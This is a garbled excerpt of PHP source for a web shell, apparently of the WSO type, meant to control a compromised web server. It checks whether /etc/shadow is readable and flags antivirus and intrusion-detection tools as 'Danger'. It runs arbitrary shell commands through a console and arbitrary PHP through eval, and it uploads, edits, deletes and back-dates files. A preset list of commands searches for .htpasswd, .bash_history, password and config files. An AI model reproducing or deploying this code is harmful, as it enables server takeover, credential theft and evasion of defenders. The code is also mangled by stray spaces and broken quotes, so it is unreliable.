if (function_exists (‘mysql_get_client_info’))
$ temp [] = “MySql (” .mysql_get_client_info (). “)”;
if (function_exists (‘mssql_connect’))
$ temp [] = “MSSQL”;
if (function_exists (‘pg_connect’))
$ temp [] = “PostgreSQL”;
if (function_exists (‘oci_connect’))
$ temp [] = “Oracle”;
showSecParam (‘Supported databases’, implode (‘, ‘, $ temp));
echo ‘<br>’;
if ($ GLOBALS [‘os’] == ‘nix’) {
showSecParam (‘Readable / etc / passwd’, @is_readable (‘/ etc / passwd’)? “yes <a href = ‘#’ onclick = ‘g (\” FilesTools \ “, \” / etc / \ “, \ “passwd \”) ‘> [view] </a> “:’ no ‘);
showSecParam (‘Readable / etc / shadow’, @is_readable (‘/ etc / shadow’)? “yes <a href = ‘#’ onclick = ‘g (\” FilesTools \ “, \” / etc / \ “, \ “shadow \”) ‘> [view] </a> “:’ no ‘);
showSecParam (‘OS version’, @file_get_contents (‘/ proc / version’));
showSecParam (‘Distr name’, @file_get_contents (‘/ etc / issue.net’));
if (! $ GLOBALS [‘safe_mode’]) {
$ userful = array (‘gcc’, ‘lcc’, ‘cc’, ‘ld’, ‘make’, ‘php’,
$ danger = array (‘kav’, ‘nod32’, ‘bdcored’, ‘uvscan’, ‘sav’, ‘drwebd’, ‘clamd’, ‘rkhunter’, ‘chkrootkit’, ‘iptables’,’ ipfw ‘,’ tripwire ‘,’ shieldcc ‘,’ portsentry ‘,’ snort ‘,’ ossec ‘,’ lidsadm ‘,’ tcplodg ‘,’ sxid ‘,’ logcheck ‘,’ logwatch ‘,’ sysmask ‘,’ zmbscap ‘,’ sawmill ‘ , ‘wormscan’, ‘ninja’);
$ downloaders = array (‘wget’, ‘fetch’, ‘lynx’, ‘links’, ‘curl’, ‘get’, ‘lwp-mirror’);
echo ‘<br>’;
$ temp = array ();
foreach ($ userful as $?)
if (which ($?))
$ temp [] = $ ?;
showSecParam (‘Userful’, implode (‘,’, $ temp));
$ temp = array ();
foreach ($ danger as $?)
if (which ($?))
$ temp [] = $ ?;
showSecParam (‘Danger’, implode (‘,’, $ temp));
$ temp = array ();
foreach ($ downloaders as $?)
if (which ($?))
$ temp [] = $ ?;
showSecParam (‘Downloaders’, implode (‘,’, $ temp));
echo ‘<br/>’;
showSecParam (‘HDD space’, ex (‘df -h’));
showSecParam (‘Hosts’, @file_get_contents (‘/ etc / hosts’));
showSecParam (‘Mount options’, @file_get_contents (‘/ etc / fstab’));
}
} else {
showSecParam (‘OS Version’, ex (‘see’));
showSecParam (‘Account Settings’, iconv (‘CP866’, ‘UTF-8’, ex (‘net accounts’)));
showSecParam (‘User Accounts’, iconv (‘CP866’, ‘UTF-8’, ex (‘net user’)));
}
echo ‘</ div>’;
hardFooter ();

if (@ $ _ POST [‘p2’] == ‘download’) {
if (@is_file ($ _ POST [‘p1’])) && @is_readable ($ _ POST [‘p1’])) {
ob_start (“ob_gzhandler”, 4096);
header (“Content-Disposition: attachment; filename =”. basename ($ _ POST [‘p1’])));
if (function_exists (“mime_content_type”)) {
$ type = @mime_content_type ($ _ POST [‘p1’]);
header (“Content-Type:”. $ type);
} else
header (“Content-Type: application / octet-stream”);
$ fp = @fopen ($ _ POST [‘p1’], “r”);
if ($ fp) {
while (! @ feof ($ fp))
echo @fread ($ fp, 1024);
fclose ($ fp);
}
} exit;
}
if (@ $ _ POST [‘p2’

$ fp = @fopen ($ _ POST [‘p1’], ‘w’);
if ($ fp) {
$ _POST [‘p2’] = “edit”;
fclose ($ fp);
}
}
}
hardHeader ();
echo ‘<h1> File tools </ h1> <div class = content>’;
if (! file_exists (@ $ _ POST [‘p1’])) {
echo ‘File not exists’;
hardFooter ();
return;
}
$ uid = @posix_getpwuid (@fileowner ($ _ POST [‘p1’])));
if (! $ uid) {
$ uid [‘name’] = @fileowner ($ _ POST [‘p1’]);
$ gid [‘name’] = @filegroup ($ _ POST [‘p1’]);
} else $ gid = @posix_getgrgid (@filegroup ($ _ POST [‘p1’])));
echo ‘<span> Name: </ span>’ .htmlspecialchars (@basename ($ _ POST [‘p1’])). ‘ <span> Size: </ span> ‘. (is_file ($ _ POST [‘ p1 ‘])? viewSize (filesize ($ _ POST [‘ p1 ‘])):’ – ‘).’ <span> Permission: </ span> ‘.viewPermsColor ($ _ POST [‘ p1 ‘])).’ <span> Owner / Group: </ span> ‘. $ uid [‘ name ‘].’ / ‘. $ gid [‘ name ‘].’ ‘<br>’;
echo ‘<span> Create time: </ span>’ .date (‘Ymd H: i: s’, filectime ($ _ POST [‘ p1 ‘])).’ <span> Access time: </ span> ‘.date (‘ Ymd H: i: s ‘, fileatime ($ _ POST [‘ p1 ‘])).’ <span> Modify time: </ span> ‘.date (‘ Ymd H: i: s’, filemtime ($ _ POST [‘p1’])). ‘<br> <br>’;
if (empty ($ _ POST [‘
p2 ‘])) $ _POST [‘ p2 ‘] =’ view ‘;
if (is_file ($ _ POST [‘p1’]))
$ m = array (‘View’, ‘Highlight’, ‘Download’, ‘Hexdump’, ‘Edit’, ‘Chmod’, ‘Rename’, ‘Touch’, ‘Frame’);
else
$ m = array (‘Chmod’, ‘Rename’, ‘Touch’);
foreach ($ m as $ v)
echo ‘<a href = # onclick = “g (null, null, \’ ‘. urlencode ($ _ POST [‘ p1 ‘])).’ \ ‘, \’ ‘. strtolower ($ v). ‘\’) “> ‘. ((strtolower ($ v) == @ $ _ POST [‘ p2 ‘])?’ <b> [‘. $ v.’] </ b> ‘: $ v ). ‘</a>’;
echo ‘<br> <br>’;
switch ($ _ POST [‘p2’])) {
case ‘view’:
echo ‘<pre class = ml1>’;
$ fp = @fopen ($ _ POST [‘p1’], ‘r’);
if ($ fp) {
while (! @feof ($ fp))
echo htmlspecialchars (@fread ($ fp, 1024));
@fclose ($ fp);
}
echo ‘</ pre>’;
break;
case ‘highlight’:
if (@is_readable ($ _ POST [‘p1’
])) { echo ‘<div class = ml1 style = “background-color: # e1e1e1; color: black;”>’;
$ oRb = @highlight_file ($ _ POST [‘p1’], true);
echo str_replace (array (‘<span’, ‘</ span>’), array (‘<font’, ‘</ font>’), $ oRb). ‘</ div>’;
}
break;
case ‘chmod’:
if (! empty ($ _ POST [‘p3’])) {
$ perms = 0;
for ($ i = strlen ($ _ POST [‘p3’]) – 1; $ i> = 0; – $ i)
$ perms + = (int) $ _ POST [‘p3’] [$ i] * pow ( 8, (strlen ($ _ POST [‘p3’]) – $ i-1));
if (! @ chmod ($ _ POST [‘p1’], $ perms))
echo ‘Can \’ t set permissions! <br> <script> document.mf.p3.value = “”; </ script> ‘;
}
clearstatcache ();
echo ‘<script> p3 _ = “”; </ script> <form onsubmit = “g (null, null, \”‘. urlencode ($ _ POST [‘p1’]). ‘\’, null,
break;
case ‘edit’:
if (! is_writable ($ _ POST [‘p1’])) {
echo ‘File isn \’ t writeable ‘;
break;
}
if (! empty ($ _ POST [‘p3’])) {
$ time = @filemtime ($ _ POST [‘p1’]);
$ _POST [‘p3’] = substr ($ _ POST [‘p3’], 1);
$ fp = @fopen ($ _ POST [‘p1’], “w”);
if ($ fp) {
@fwrite ($ fp, $ _ POST [‘p3’]);
@fclose ($ fp);
echo ‘Saved! <br> <br> <script> p3 _ = “”; </ script>’;
@touch ($ _ POST [‘p1’], $ time, $ time);
}
}
echo ‘<form onsubmit = “g (null, null, \’ ‘. urlencode ($ _ POST [‘ p1 ‘]))’ ‘, null, \’ 1 \ ‘+ this.text.value);

while (! @feof ($ fp))
echo htmlspecialchars (@fread ($ fp, 1024));
@fclose ($ fp);
}
echo ‘</ textarea> <input type = submit value = “submit”> </ form>’;
break;
case ‘hexdump’:
$ c = @file_get_contents ($ _ POST [‘p1’]);
$ n = 0;
$ h = array (‘00000000 <br>’, ”, ”);
$ len = strlen ($ c);
for ($ i = 0; $ i <$ len; ++ $ i) {
$ h [1]. = sprintf (‘% 02X’, ord ($ c [$ i])). ‘ ‘;
switch (ord ($ c [$ i])) {
case 0: $ h [2]. = ”; break;
case 9: $ h [2]. = ”; break;
case 10: $ h [2]. = ”; break;
case 13: $ h [2]. = ”; break;
default: $ h [2]. = $ c [$ i]; break;
}
$ n ++;
if ($ n == 32) {
$ n = 0;
if ($ i + 1 <$ len) {$ h [0]. = sprintf (‘% 08X’, $ i + 1). ‘<br>’;}
$ h [1]. = ‘<br>’ ;
$ h [2]. = “\ n”;
}
}
echo ‘<table cellspacing = 1 cellpadding = 5 bgcolor = # 222> <tr> <td bgcolor = # 202832> <span style = “font-weight: normal;”> <pre>’. $ h [0] . ‘</ pre> </ span> </ td> <td bgcolor = # 060a10> <pre>’. $ h [1]. ‘</ pre> </ td> <td bgcolor = # 202832> <pre > ‘. htmlspecialchars ($ h [2]).’ </ pre> </ td> </ tr> </ table> ‘;
break;
case ‘rename’:
if (! empty ($ _ POST [‘p3’])) {
if (! @ rename ($ _ POST [‘p1’], $ _POST [‘p3’]))
echo ‘Can \’ t rename! <br> ‘;
else
die (‘<script> g (null, null, “‘. urlencode ($ _ POST [‘p3’]). ‘”, null, “”) </ script>’);
}
echo ‘<form onsubmit = “g (null, null, \’ ‘. urlencode ($ _ POST [‘ p1 ‘]))’ ‘, null, this.name.value); return false;”> <input type = text name = name value = “‘. htmlspecialchars ($ _ POST [‘ p1 ‘])).'”> <input type = submit value = “submit”> </ form> ‘;
break;
case ‘touch’:
if (! empty ($ _ POST [‘p3’])) {
$ time = strtotime ($ _ POST [‘p3’]);
if ($ time) {
if (! touch ($ _ POST [‘p1’], $ time, $ time))
echo ‘Fail!’;
else
echo ‘Touched!’;
} else echo ‘Bad time format!’;
}
clearstatcache ();
echo ‘<script> p3 _ = “”; </ script> <form onsubmit = “g (null, null, \”‘. urlencode ($ _ POST [‘p1’]). ‘\’, null, this.touch. value); return false; “> <input type = text name = touch value =” ‘. date (“Ymd H: i: s”, @filemtime ($ _ POST [‘ p1 ‘])).’ “> <input type = submit value = “submit”> </ form> ‘;
break;
/ * (?) 12.2015 mitryz * /
case ‘frame’:
$ frameSrc = substr (htmlspecialchars ($ GLOBALS [‘cwd’]), strlen (htmlspecialchars ($ _ SERVER [‘DOCUMENT_ROOT’]))));
if ($ frameSrc [0]! = ‘/’)
$ frameSrc = ‘/’. $ frameSrc;
if ($ frameSrc [strlen ($ frameSrc) – 1]! = ‘/’)
$ frameSrc = $ frameSrc. ‘/’;
$ frameSrc = $ frameSrc. htmlspecialchars ($ _ POST [‘p1’]);
echo ‘<iframe width = “100%” height = “900px” scrolling = “no” src =’. $ frameSrc. ‘ onload = “onload = height = contentDocument.body.scrollHeight”> </ iframe> ‘;
break;
}
echo ‘</ div>’;
hardFooter ();
}
if ($ os == ‘win’)
$ aliases = array (
“List Directory” => “dir”,
“Find index.php in current dir” => “dir / s / w / b index.php”,
“Find * config * .php in current dir” => “dir / s / w / b * config * .php”,
“Show active connections” => “netstat -an”,
“Show running services” => “net start “,
” User accounts “=>
“net user”, “Show computers” => “net view”,
“ARP Table” => “arp -a”,
“IP Configuration” => “ipconfig / all”
);
else
$ aliases = array (
“List dir” => “ls -lha”,
“list file attributes on a Linux second extended file system” => “lsattr -va”,
“show opened ports” => “netstat -an | grep -i listen “,
” process status “=>” ps aux “,
” Find “=>” “,
” find all suid files “=>” find / -type f -perm -04000 -ls “,
” find suid files in current dir “=>” find. -type f -perm -04000 -ls “,
” find all sgid files “=>” find / -type f -perm -02000 -ls “,
” find sgid files in current dir ” => “find. -type f -perm -02000 -ls”,
“find config.inc.php files”=> “find / -type f -name config.inc.php”,
“find config * files” => “find / -type f -name \” config * \ “”,
“find config * files in current dir” => “find. -type f -name \” config * \ “”,
“find all writable folders and files” => “find / -perm -2 -ls”,
“find all writable folders and files in current dir “=>” find. -perm -2 -ls “,
” find all service.pwd files “=>” find / -type f -name service.pwd “,
” find service.pwd files in current dir “=>” find. -type f -name service.pwd “,
” find all .htpasswd files “=>” find / -type f -name .htpasswd “,
” find .htpasswd files in current dir ” => “find. -type f -name .htpasswd”,
“find all .bash_history files” => “find / -type f -name .bash_history”,
“find .bash_history files in current dir” => “find. -type f -name .bash_history”,
“find all .fetchmailrc files” => “find / -type f -name .fetchmailrc”,
“find .fetchmailrc files in current dir” => “find. -type f -name .fetchmailrc”,
“Locate” => ” “,
” locate httpd.conf files “=>” locate httpd.conf “,
” locate vhosts.conf files “=>” locate vhosts.conf “,
” locate proftpd.conf files “=>” locate proftpd.conf “,
“locate psybnc.conf files” => “locate psybnc.conf”,
“locate my.conf files” => “locate my.conf”,
“locate admin.php files” => “locate admin.php”,
“locate cfg.php files “=>” locate cfg.php “,
“locate conf.php files” => “locate conf.php”,
“locate config.dat files” => “locate config.dat”,
“locate config.php files” => “locate config.php”,
“locate config.inc files” => “locate config.inc”,
“locate config.inc.php” => “locate config.inc.php”,
“locate config.default.php files” => “locate config. default.php “,
” locate config * files “=>” locate config “,
” locate .conf files “=>” locate ‘.conf’ “,
” locate .pwd files “=>” locate ‘.pwd’ “,
“locate .sql files” => “locate ‘.sql'”,
“locate .htpasswd files” => “locate ‘.htpasswd'”,
“locate .bash_history files” => “locate ‘.bash_history'”,
“locate .mysql_history files “=>”locate ‘.mysql_history’ “,
” locate .fetchmailrc files “=>” locate ‘.fetchmailrc’ “,
” locate backup files “=>” locate backup “,
” locate dump files “=>” locate dump “,
“locate priv files” => “locate priv”
);
function actionConsole () {
if (! empty ($ _ POST [‘p1’]) &&! empty ($ _ POST [‘p2’])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘stderr_to_out’, true );
$ _POST [‘p1’]. = ‘2> & 1’;
} elseif (! empty ($ _ POST [‘p1’])))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘stderr_to_out’, 0);
if (isset ($ _ POST [‘ajax’])) {
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, true);
ob_start ();
echo “d.cf.cmd.value = ”; \ n”;
$ temp = @iconv ($ _ POST [‘charset’], ‘UTF-8’, addcslashes (“\ n $”. $ _ POST [‘p1’]. “\ n” .ex ($ _ POST [‘ p1 ‘]), “\ n \ r \ t \’ \ 0”));
if (preg_match (“!. * cd \ s + ([^;] +) $!”, $ _ POST [‘p1’], $ match)) {
if (@chdir ($ match [1])) {
$ GLOBALS [‘cwd’] = @getcwd ();
echo “c _ = ‘”. $ GLOBALS [‘ cwd ‘]. “‘;”;
}
}
echo “d.cf.output.value + = ‘”. $ temp. “‘;”;
echo “d.cf.output.scrollTop = d.cf.output.scrollHeight;”;
$ temp = ob_get_clean ();
echo strlen ($ temp), “\ n”, $ temp;
exit;
}
if (empty ($ _ POST [‘ajax’]) &&! empty ($ _ POST [‘p1’]))
prototype (md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’, 0);
hardHeader ();
echo “<script>
if (window.Event) window.captureEvents (Event.KEYDOWN);
var cmds = new Array (”);
var cur = 0;
function kp (e) {
var n = (window.Event)? e.which: e.keyCode;
if (n == 38) {
cur–;
if (cur> = 0)
document.cf.cmd.value = cmds [cur];
else
cur ++;
} else if (n == 40) {
cur ++;
if (cur <cmds.length)
document.cf.cmd.value = cmds [cur];
else
cur–;
}
}
function add (cmd) {
cmds.pop ();
cmds.push (cmd);
cmds.push (”);
cur = cmds.length-1;
}
</ script> “;
echo ‘<h1> Console </ h1> <div class = content> <form name = cf onsubmit = “if (d.cf.cmd.value == \’ clear \ ‘) {d.cf.output.value = \ ‘\’; d.cf.cmd.value = \ ‘\’; return false;} add (this.cmd.value); if (this.ajax.checked) {a (null, null, this.cmd. value, this.show_errors.checked? 1: \ ‘\’);} else {g (null, null, this.cmd.value, this.show_errors.checked? 1: \ ‘\’);} return false; ” > <label> <select name = alias> ‘;
foreach ($ GLOBALS [‘aliases’] as $ n => $ v) {
if ($ v == ”) {
echo ‘<optgroup label = “-‘. htmlspecialchars ($ n) .’-“> </ optgroup> ‘;
continue;
}
echo ‘<option value = “‘. htmlspecialchars ($ v). ‘”>’. $ n. ‘</ option>’;

echo ‘</ select> </ label> <input type = button onclick = “add (d.cf.alias.value); if (d.cf.ajax.checked) {a (null, null, d.cf. alias.value, d.cf.show_errors.checked? 1: \ ‘\’);} else {g (null, null, d.cf.alias.value, d.cf.show_errors.checked? 1: \ ‘\ ‘);} “value =” submit “> <nobr> <input type = checkbox name = ajax value = 1’. (@ $ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’]? ‘checked ‘:’ ‘).’> send using AJAX <input type = checkbox name = show_errors value = 1 ‘. (! empty ($ _ POST [‘ p2 ‘])) || $ _COOKIE [md5 ($ _ SERVER [‘ HTTP_HOST ‘] ) ‘stderr_to_out’]? ‘checked’: ”). ‘> redirect stderr to stdout (2> & 1) </ nobr> <br/> <textarea class = bigarea name = output style = “border-bottom: 0 ; margin-top: 5px; ” readonly> ‘;
if (! empty ($ _ POST [‘p1’])) {
echo htmlspecialchars (“$”. $ _ POST [‘p1’]. “\ n” .ex ($ _ POST [‘p1’]));
}
echo ‘</ textarea> <table style = “border: 1px solid # 060a10; background-color: # 060a10; border-top: 0px;” cellpadding = 0 cellspacing = 0 width = “100%”> <tr> <td style = “padding-left: 4px; width: 13px;”> $ </ td> <td> <input type = text name = cmd style = “border: 0px; width: 100%;” onkeydown = “kp (event);”> </ td> </ tr> </ table> ‘;
echo ‘</ form> </ div> <script> d.cf.cmd.focus (); </ script>’;
hardFooter ();
}
function actionPhp () {
if (isset ($ _ POST [‘ajax’])) {
$ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’] = true;
ob_start ();
eval ($ _ POST [‘p1’]);
$ temp = “document.getElementById (‘PhpOutput’).
echo strlen ($ temp), “\ n”, $ temp;
exit;
}
hardHeader ();
if (isset ($ _ POST [‘p2’])) && ($ _POST [‘p2’] == ‘info’)) {
echo ‘<h1> PHP info </ h1> <div class = content>’;
ob_start ();
phpinfo ();
$ tmp = ob_get_clean ();
$ tmp = preg_replace (‘! body {. *}! msiU’, ”, $ tmp);
$ tmp = preg_replace (‘! a: \ w + {. *}! msiU’, ”, $ tmp);
$ tmp = preg_replace (‘! h1! msiU’, ‘h2’, $ tmp);
$ tmp = preg_replace (‘! td, th {(. *)}! msiU’, ‘. e, .v, .h, .h th {$ 1}’, $ tmp);
$ tmp = preg_replace (‘! body, td, th, h2, h2 {. *}! msiU’, ”, $ tmp);
echo $ tmp;
echo ‘</ div> < br> ‘;
}
if (empty ($ _ POST [‘ajax’]) &&! empty ($ _ POST [‘p1’]))
$ _COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘Ajax’] = false;
echo ‘<h1> Execution PHP-code </ h1> <div class = content> <form name = pf method = post onsubmit = “if (this.ajax.checked) {a (null, null, this.code.value );} else {g (null, null, this.code.value, \ ‘\’);} return false; “> <textarea name = code class = bigarea id = PhpCode> ‘. (! empty ($ _ POST [ ‘p1’])? htmlspecialchars ($ _ POST [‘p1’]): ”). ” </ textarea> <input type = submit value = Eval style = “margin-top: 5px”> ‘;
echo ‘<input type = checkbox name = ajax value = 1’. ($ _ COOKIE [md5 ($ _ SERVER [‘HTTP_HOST’]). ‘ajax’]? ‘checked’: ”). ‘> send using AJAX </ form> <pre id = PhpOutput style = “‘. (empty ($ _ POST [‘ p1 ‘])?’ display: none; ‘:

}
echo ‘</ pre> </ div>’;
hardFooter ();
}
function actionFilesMan () {
if (! empty ($ _COOKIE [‘f’]))
$ _COOKIE [‘f’] = @unserialize ($ _ COOKIE [‘f’]);

if (! empty ($ _ POST [‘p1’])) {
switch ($ _ POST [‘p1’])) {
case ‘uploadFile’:
if (is_array ($ _ FILES [‘f’] [‘tmp_name’])) {
foreach ($ _FILES [‘f’] [‘tmp_name’] as $ i => $ tmpName) {
if (! @ move_uploaded_file ($ tmpName, $ _FILES [‘f’] [‘name’] [$ i])) {
echo “Can not upload file!”;
}
}
}
break;
case ‘mkdir’:
if (! @ mkdir ($ _ POST [‘p2’
])) echo “Can not create new dir”;
break;
case ‘delete’:
function deleteDir ($ path) {
$ path = (substr ($ path, -1) == ‘/’)? $ path: $ path. ‘/’;
$ dh = opendir ($ path);
while (($? = readdir ($ dh))! == false) {
$? = $ path. $ ?;
if ((basename ($?) == “..”) || (basename ($?) == “.”))
continue;
$ type = filetype ($?);
if ($ type == “dir”)
deleteDir ($?);
else
@unlink ($?);
}
closedir ($ dh);
@rmdir ($ path);
}
if (is_array (@ $ _ POST [‘f’]))
foreach ($ _ POST [‘f’] as $ f) {
if ($ f == ‘..’)
continue;
$ f = urldecode ($ f);
if (is_dir ($ f))
deleteDir ($ f);
else
@unlink ($ f);
}
break;
case ‘paste’:
if ($ _ COOKIE [‘act’] == ‘copy’) {
function copy_paste ($ c, $ s, $ d) {
if (is_dir ($ c. $ s)) {
mkdir ($ d . $ s);
$ h = @opendir ($ c. $ s);
while (($ f = @readdir ($ h))! == false)
if (($ f! = “.”) and ($ f! = “..”))
copy_paste ($ c. $ s. ‘ / ‘, $ f, $ d. $ s.’ / ‘);
} elseif (is_file ($ c. $ s))
@copy ($ c. $ s, $ d. $ s);
}
foreach ($ _ COOKIE [‘f’] as $ f)
copy_paste ($ _ COOKIE [‘c’], $ f, $ GLOBALS [‘cwd’]);
} elseif ($ _ COOKIE [‘act’] == ‘move’) {
function move_paste ($ c, $ s, $ d) {
if (is_dir ($ c. $ s)) {
mkdir ($ d. $ s) ;
$ h = @opendir ($ c. $ s);

if (($ f! = “.”) and ($ f! = “..”))
copy_paste ($ c. $ s. ‘/’, $ f, $ d. $ s. ‘/’);
} elseif (@is_file ($ c. $ s))
@copy ($ c. $ s, $ d. $ s);
}
foreach ($ _ COOKIE [‘f’] as $ f)
@rename ($ _ COOKIE [‘c’]. $ f, $ GLOBALS [‘cwd’]. $ f);
} elseif ($ _ COOKIE [‘act’] == ‘zip’) {
if (class_exists (‘ZipArchive’)) {
$ zip = new ZipArchive ();
if ($ zip-> open ($ _ POST [‘p2’], 1)) {
chdir ($ _ COOKIE [‘c’]);
foreach ($ _ COOKIE [‘f’] as $ f) {
if ($ f == ‘..’)
continue;
if (@is_file ($ _ COOKIE [‘c’]. $ f))
$ zip-> addFile ($ _ COOKIE [‘c’]. $ f, $ f);
elseif (@is_dir ($ _ COOKIE [‘
$ iterator = new RecursiveIteratorIterator (new RecursiveDirectoryIterator ($ f. ‘/’, FilesystemIterator :: SKIP_DOTS));
foreach ($ iterator as $ key => $ value) {
$ zip-> addFile (realpath ($ key), $ key);
}
}
}
chdir ($ GLOBALS [‘cwd’]);
$ zip-> close ();
}
}
} elseif ($ _ COOKIE [‘act’] == ‘unzip’) {
if (class_exists (‘ZipArchive’)) {
$ zip = new ZipArchive ();
foreach ($ _ COOKIE [‘f’] as $ f) {
if ($ zip-> open ($ _ COOKIE [‘c’]. $ f)) {
$ zip-> extractTo ($ GLOBALS [‘cwd’]);
$ zip-> close ();
}
}
}
} elseif ($ _ COOKIE [‘act’] == ‘tar’

$ _COOKIE [‘f’] = array_map (‘escapeshellarg’, $ _COOKIE [‘f’]);
ex (‘tar cfzv’. escapeshellarg ($ _ POST [‘p2’]). ”. implode (”, $ _COOKIE [‘f’]));
chdir ($ GLOBALS [‘cwd’]);
}
unset ($ _ COOKIE [‘f’]);
setcookie (‘f’, ”, time () – 3600);
break;
default:
if (! empty ($ _ POST [‘p1’])) {
prototype (‘act’, $ _POST [‘p1’]);
prototype (‘f’, serialize (@ $ _ POST [‘f’])));
prototype (‘c’, @ $ _ POST [‘c’]);
}
break;
}
}
hardHeader ();
echo ‘<h1> File manager </ h1> <div class = content> <script> p1_ = p2_ = p3 _ = “”; </ script> ‘;
$ dirContent = hardScandir (isset ($ _ POST [‘c’])? $ _ POST [‘c’]: $ GLOBALS [‘cwd’]);
if ($ dirContent === false) {echo ‘Can \’ t open this folder! ‘; hardFooter (); return; }
global $ sort;
$ sort = array (‘name’, 1);
if (! empty ($ _ POST [‘p1’])) {
if (preg_match (‘! s _ ([Az] +) _ (\ d {1})!’, $ _POST [‘p1’], $ match) )
$ sort = array ($ match [1], (int) $ match [2]);
}
echo “<script>
function sa () {
for (i = 0; i <d.files.elements.length; i ++)
if (d.files.elements [i] .type == ‘checkbox’)
d.files .elements [i] .checked = d.files.elements [0] .checked;
}
</ script>
<table width = ‘100%’ class = ‘main’ cellspacing = ‘0’ cellpadding = ‘2’>
<form name = files method = post> <tr> <th width = ’13px’> <input type = checkbox onclick = ‘sa ()’ class = chkbx> </ th> <th> <a href = ‘#’ onclick = ‘g (\ “FilesMan \”, null, \ “s_name _”. ($ sort [1]? 0: 1). “\”)’> Name </a> </ th> <th> <a href = ‘#’ onclick = ‘g (\ “FilesMan \”, null, \ “s_size _”. ($ sort [1]? 0: 1). “\”)’> Size </a> </ th> <th> <a href=’#’onclick=’g(\”FilesMan\”, null,\”s_modify_”.($sort[1]?0:1).”\”>’> Modify </ a > </ th> <th> Owner / Group </ th> <th> <a href = ‘#’ onclick = ‘g (\ “FilesMan \”, null, \ “s_perms _”. ($ sort [1]? 0: 1). “\”) ‘> Permissions </a> </ th> <th>Actions </ th> </ tr> “;
$ dirs = $ files = array ();
$ n = count ($ dirContent);
for ($ i = 0; $ i <$ n; $ i ++) {
$ ow = @posix_getpwuid (@fileowner ($ dirContent [$ i]));
$ gr = @posix_getgrgid (@filegroup ($ dirContent [$ i]));
$ tmp = array (‘name’ => $ dirContent [$ i],
‘path’ => $ GLOBALS [‘cwd’]. $ dirContent [$ i],
‘modify’ => date (‘Ymd H: i: s’, @filemtime ($ GLOBALS [‘cwd’]. $ dirContent [ $ i])),
‘perms’ => viewPermsColor ($ GLOBALS [‘cwd’]. $ dirContent [$ i]),
‘size’ => @filesize ($ GLOBALS [‘cwd’]. $ dirContent [$ i ]),
‘owner’ => $ ow [‘name’]? $ ow [‘name’]: @ fileowner ($ dirContent [$ i]),
‘group’ => $ gr [‘name’]? $ gr [‘name’]: @ filegroup ($ dirContent [$ i])
);
if (@is_file ($ GLOBALS [‘cwd’]. $ dirContent [$ i]))
$ files [] = array_merge ($ tmp, array (‘type’ => ‘file’));
elseif (@is_link ($ GLOBALS [‘cwd’]. $ dirContent [$ i]))
$ dirs [] = array_merge ($ tmp, array (‘type’ => ‘link’, ‘link’ => readlink ($ tmp [‘path’])));
elseif (@is_dir ($ GLOBALS [‘cwd’]. $ dirContent [$ i]) && ($ dirContent [$ i]! = “.”))
$ dirs [] = array_merge ($ tmp, array (‘type’ => ‘dir’));
}
$ GLOBALS [‘sort’] = $ sort;
function cmp ($ a, $ b) {
if ($ GLOBALS [‘sort’] [0]! = ‘size’)
return strcmp (strtolower ($ a [$ GLOBALS [‘sort’] [0]]), strtolower ($ b [$ GLOBALS [‘sort’] [0]])) * ($ GLOBALS [‘sort’] [1]? 1: -1);
else
return (($ a [‘size’] <$ b [‘size’])? -1: 1) * ($ GLOBALS [‘sort’] [1]? 1: -1);
}
usort ($ files, “cmp”);
usort ($ dirs, “cmp”);
$ files = array_merge ($ dirs, $ files);
$ l = 0;
foreach ($ files as $ f) {
echo ‘<tr’. ($ l? ‘class = l1’: ”). ‘> <td> <input type = checkbox name = “f []” value = “‘. urlencode ($ f [‘name’ ]). ‘”class = chkbx> </ td> <td> <a href = # onclick =”‘. (($ f [‘type’] == ‘file’)? ‘g (\’ FilesTools \ ‘ , null, \ ”. urlencode ($ f [‘name’]). ‘\’, \ ‘view \’) “> ‘. htmlspecialchars ($ f [‘ name ‘]):’ g (\ ‘FilesMan \ ‘, \’ ‘. $ f [‘ path ‘].’ \ ‘); “‘. (empty ($ f [‘link’])? ”:” title = ‘{$ f [‘ link ‘]} ‘”).’> <b> [‘. htmlspecialchars ($ f [‘ name ‘]).’] </ b> ‘).’ </a> </ td> <td> ‘. (($ f [‘type’] == ‘file’)? viewSize ($ f [‘size’]): $ f [‘type’]). ‘</ td> <td> ‘. $ f [‘ modify ‘].’ </ td> <td> ‘. $ f [‘ owner ‘].’ / ‘. $ f [‘ group ‘].’ </ td> <td> <a href=# onclick=”g(\’FilesTools\’,null,\”.urlencode($f[‘name’]).’\’,\’chmod\’)”> ‘. $ f [‘ perms’]
. ‘</ td> <td> <a class = “tooltip” data-tooltip = “Rename” href = “#” onclick = “g (\’ FilesTools \ ‘, null, \”‘. urlencode ($ f [ ‘name’]). ‘\’, \ ‘rename \’) “> R </a> <a class =” tooltip “data-tooltip =” Touch “href =” # “onclick =” g (\ ‘FilesTools \ ‘, null, \’ ‘. urlencode ($ f [‘ name ‘]).’ \ ‘, \’ touch \ ‘) “> T </a>’. (($ f [‘type’] == ‘file’)? ‘<a class = “tooltip” data-tooltip = “Frame” href = “#” onclick = “g (\’ FilesTools \ ‘, null, \”‘. urlencode ($ f [‘name’ ]). ‘\’, \ ‘frame \’) “> F </a> <a class =” tooltip “data-tooltip =” Edit “href =” # “onclick =” g (\ ‘FilesTools \ ‘, null, \ “‘. Urlencode ($ f [‘name’]). ‘\’, \ ‘Edit \’)”> E </a> <a class = “tooltip” data-tooltip = ” Download “href =” # “onclick =” g (\ ‘FilesTools \’, null, \ ”. Urlencode ($ f [‘name’]). ‘\’, \ ‘Download \’) “> D </ a> ‘:’ ‘).’ </ td> </ tr> ‘;
$ l = $ l? 0: 1;
}
echo “<tr id = fak> <td colspan = 7>
<input type = hidden name = ne value = ”>download \ ‘) “> D </a>’: ”). ‘</ td> </ tr>’; $ l = $ l? 0: 1; } echo” <tr id = fak> <td colspan = 7> <input type = hidden name = ne value = ”>download \ ‘) “> D </a>’: ”). ‘</ td> </ tr>’; $ l = $ l? 0: 1; } echo” <tr id = fak> <td colspan = 7> <input type = hidden name = ne value = ”>
<input type = hidden name = a value = ‘FilesMan’>
<input type = hidden name = c value = ‘”. htmlspecialchars ($ GLOBALS [‘ cwd ‘]).”‘>
